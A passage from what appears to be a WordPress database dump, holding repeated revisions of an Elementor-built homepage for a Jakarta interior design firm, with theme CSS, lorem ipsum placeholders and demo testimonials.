href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:28:59','2023-05-30 08:28:59','',22,'https://bauhaus.futuremediatrix.com/?p=4793',0,'revision','',0),(4794,2,'2023-05-30 08:29:00','2023-05-30 08:29:00','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media (max-width:767px){.elementor-progress-text{padding-left:10px}}.e-con-inner .elementor-progress-wrapper,.e-con .elementor-progress-wrapper{height:auto}</style>			\n				Archirecture\n									80%\n				Designing\n									60%\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"1032\" height=\"578\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose.jpg 1032w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-300x168.jpg 300w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-1024x574.jpg 1024w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-768x430.jpg 768w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/image-why-choose-600x336.jpg 600w\" sizes=\"(max-width: 1032px) 100vw, 1032px\" />															\n							<h3>Real Testimonials</h3>\n														<h2>\n								What they’re talking\nabout retirio							</h2>\n			<section>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/jessica.jpg\" alt=\"Jessica brown \" >\n																							<p>\n													Jessica brown 												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/mike-hardson.jpg\" alt=\"Mike hardson\" >\n																							<p>\n													Mike hardson												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n																																			<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/kevin-martin.jpg\" alt=\"Kevin martin\" >\n																							<p>\n													Kevin martin												</p>\n																							<p>\n													Our customer												</p>\n																						<!-- rating -->\n														<i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i><i>&#xE934;</i> 													\n																							<!-- end rating -->\n									<!-- end info -->\n																		<p>\n										Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.									</p>\n			</section>\n							<h3>Our process</h3>\n														<h2>\n								4 easy work steps							</h2>\n					Design\nconcept \n					01\n					Design\nschematic \n					02\n					Design\ndevelopment\n					03\n					Construction\ndevelopment\n					04\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01-test.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-home1-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05-home1.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06-home1.png\" alt=\"\" loading=\"lazy\" />															\n							<h3>Direct from the blog posts</h3>\n														<h2>\nCheckout our latest news\nand articles							</h2>\n					<ul>\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/images/placeholder.png\" alt=\" Hello world!\">\n							</a>\n									14\n									November\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/11/14/hello-world/\" rel=\"bookmark\" title=\"Hello world!\">\n								Hello world!							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-5.jpg\" alt=\" What is the future of interior design?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/#respond\"> 0 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/what-is-the-future-of-interior-design/\" rel=\"bookmark\" title=\"What is the future of interior design?\">\n								What is the future of interior design?							</a>\n						</h2>\n				</li>	\n							<li>\n						    							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/blog-02.jpg\" alt=\" Do you need math for architecture?\">\n							</a>\n									23\n									June\n										<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/#comments\"> 1 Comment</a>              \n						<h2>\n							<a href=\"https://bauhaus.futuremediatrix.com/2022/06/23/do-you-need-math-for-architecture/\" rel=\"bookmark\" title=\"Do you need math for architecture?\">\n								Do you need math for architecture?							</a>\n						</h2>\n				</li>	\n					</ul>\n							<h3>Hire us for your new projects</h3>\n														<h2>\n								Get interior designs right now							</h2>\n			<a href=\"https://demo.ovatheme.com/retirio/contact/\" role=\"button\">\n						contact with us\n					</a>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-box.min.css\">		\n				<h3>\n						This is the heading					\n				</h3>\n									<p>\n						Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.					</p>','Home 1','','inherit','closed','closed','','22-revision-v1','','','2023-05-30 08:29:00','2023-05-30 08:29:00','',22,'https://bauhaus.futuremediatrix.com/?p=4794',0,'revision','',0),(4796,2,'2023-05-30 08:30:43','2023-05-30 08:30:43','','IMG-5878','','inherit','open','closed','','img-5878','','','2023-05-30 08:30:43','2023-05-30 08:30:43','',22,'https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-5878.jpg',0,'attachment','image/jpeg',0),(4797,2,'2023-05-30 08:32:31','2023-05-30 08:32:31','[rev_slider alias=\"home-1\" slidertitle=\"Home 1\"][/rev_slider]		\n					<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/decor-home-1-about-interior.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927c-scaled.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-1065.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-2927.jpg\" alt=\"\">\n					<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/IMG-9402.jpg\" alt=\"\">\n							<h3>ABOUT US</h3>\n														<h2>\n								LOREM IPSUM							</h2>\n		<p>LOREM IPSUM</p><p>Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. </p>		\n			<a href=\"https://bauhaus.futuremediatrix.com/about/\" role=\"button\">\n						More\n					</a>\n							<h3>SERVICES WE DO</h3>\n														<h2>\nOur highlighted services\nfor interior design							</h2>\n		Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.		\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n	        				<h4>\n					Residential				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/residential/\"  title=\"Residential\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n	        				<h4>\n					Commercial				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/commercial/\"  title=\"Commercial\">\n		</a>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n	        				<h4>\n					Office				</h4>\n		</a>\n					<p>\n				Nunc eleifend eget nunc eget consequat. Etiam sed varius est. Proin et lacus odio.			</p>\n		<a href=\"https://bauhaus.futuremediatrix.com/service/office/\"  title=\"Office\">\n		</a>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-con{--container-widget-width:100%}.e-con-inner>.elementor-widget-spacer,.e-con>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container,.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer,.e-con>.elementor-widget-spacer>.elementor-widget-container,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-con-inner>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner,.e-con>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n							<h3>our recent work</h3>\n														<h2>\n								Introducing outstanding new projects							</h2>\n        <!--  -->\n                    <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                                <li data-slug=\"2022\">\n                    2022                </li>\n                                <li data-slug=\"2021\">\n                    2021                </li>\n                                <li data-slug=\"2020\">\n                    2020                </li>\n                                <li data-slug=\"2019\">\n                    2019                </li>\n                                <li data-slug=\"2018\">\n                    2018                </li>\n            </ul>    \n            <svg width=\"50\" height=\"50\">\n                <circle cx=\"25\" cy=\"25\" r=\"10\" />\n                <circle cx=\"25\" cy=\"25\" r=\"20\" />\n            </svg>\n           <h4>no data</h4>\n							<h3>our benefits</h3>\n														<h2>\n								Why choose ?							</h2>\n							<p> There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\n </p>\n			<link rel=\"stylesheet\" href=\"https://bauhaus.futuremediatrix.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css\">		<ul>\n							<li>\n										Architecture business solutions\n									</li>\n								<li>\n										Top quality services with reasonable price\n									</li>\n								<li>\n										Reliable & experienced architecture & designers\n									</li>\n						</ul>\n			<style>/*! elementor - v3.8.1 - 13-11-2022 */\n.elementor-widget-progress{text-align:left}.elementor-progress-wrapper{position:relative;background-color:#eee;color:#fff;height:100%;border-radius:2px}.elementor-progress-bar{display:-webkit-box;display:-ms-flexbox;display:flex;background-color:#818a91;width:0;font-size:11px;height:30px;line-height:30px;border-radius:2px;-webkit-transition:width 1s ease-in-out;-o-transition:width 1s ease-in-out;transition:width 1s ease-in-out}.elementor-progress-text{-webkit-box-flex:1;-ms-flex-positive:1;flex-grow:1;white-space:nowrap;-o-text-overflow:ellipsis;text-overflow:ellipsis;overflow:hidden;padding-left:15px}.elementor-progress-percentage{padding-right:15px}.elementor-widget-progress .elementor-progress-wrapper.progress-info .elementor-progress-bar{background-color:#5bc0de}.elementor-widget-progress .elementor-progress-wrapper.progress-success .elementor-progress-bar{background-color:#5cb85c}.elementor-widget-progress .elementor-progress-wrapper.progress-warning .elementor-progress-bar{background-color:#f0ad4e}.elementor-widget-progress .elementor-progress-wrapper.progress-danger .elementor-progress-bar{background-color:#d9534f}.elementor-progress .elementor-title{display:block}@media 